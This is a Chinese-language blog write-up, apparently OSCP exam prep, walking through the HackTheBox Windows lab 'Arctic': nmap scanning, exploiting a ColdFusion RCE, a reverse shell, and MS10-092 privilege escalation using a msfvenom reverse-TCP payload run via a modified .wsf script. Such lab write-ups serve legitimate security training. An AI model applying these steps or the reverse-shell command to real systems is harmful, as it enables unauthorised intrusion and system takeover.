EthanDoctor

OSCP备考_0x43_HackThBox靶机_Windows_arctic

Ethan医生2周前靶场23

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.249.241 (扫描TCP)

image.png

http://10.129.249.241:8500/CFIDE/

image.png

image.png

image.png

searchsploit ADOBE COLDFUSION

查找看看有没有exp

image.png

发现一个RCE 测试看看

然后反弹SHELL

image.png

提全使用ms10 092

https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS10-092/CVE-2010-3338.wsf

将文件下载下来

同时创建一个反弹shell'

msfvenom -p windows/x64/shellreversetcp LHOST=10.10.16.43 LPORT=7777 -f exe >priv.exe

将这两个都上传到靶机

对了,在上传之前,要修改wsf

将原来的月改为minute ,同时tr后面的跟的定时任务也要指定到咱们priv。exe的路径


回到cmd下

cscript CVE-2010-3338.wsf

image.png


标签: OSCP
返回列表

上一篇:OSCP备考_0x42_HackThBox靶机_Windows_grandpa

下一篇:OSCP备考_0x44_HackThBox靶机_Windows_ Silo

相关文章

OSCP备考_0x53_HackThBox靶机_Windows_Active(AD域)

OSCP备考_0x53_HackThBox靶机_Windows_Active(AD域)

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.237.97 (扫描TCP)enum4linux(自动化枚举)   ...

OSCP备考_0x22_Vulnhub靶机_symfonos: 5

OSCP备考_0x22_Vulnhub靶机_symfonos: 5

名称说明靶机下载链接https://www.vulnhub.com/entry/symfonos-52,415/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

OSCP备考_0x09_Vulnhub靶机_SickOs: 1.1

OSCP备考_0x09_Vulnhub靶机_SickOs: 1.1

名称说明靶机下载链接https://www.vulnhub.com/entry/sickos-11,132/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.16...

OSCP备考_0x41_HackThBox靶机_Windows_granny

OSCP备考_0x41_HackThBox靶机_Windows_granny

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.252.188 (扫描TCP)发现有webdav可以利用davtest -url htt...

OSCP备考_0x10_Vulnhub靶机_GoldenEye: 1

OSCP备考_0x10_Vulnhub靶机_GoldenEye: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/goldeneye-1,240/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

OSCP备考_0x30_HackThBox靶机_Linux_Doctor

OSCP备考_0x30_HackThBox靶机_Linux_Doctor

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.7.227 (扫描TCP)nmap -sU --top-ports 100 10.129.7.22...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Copyright Your hacksec.top Rights Reserved.

Powered By Z-BlogPHP. - 鄂ICP备2025099786号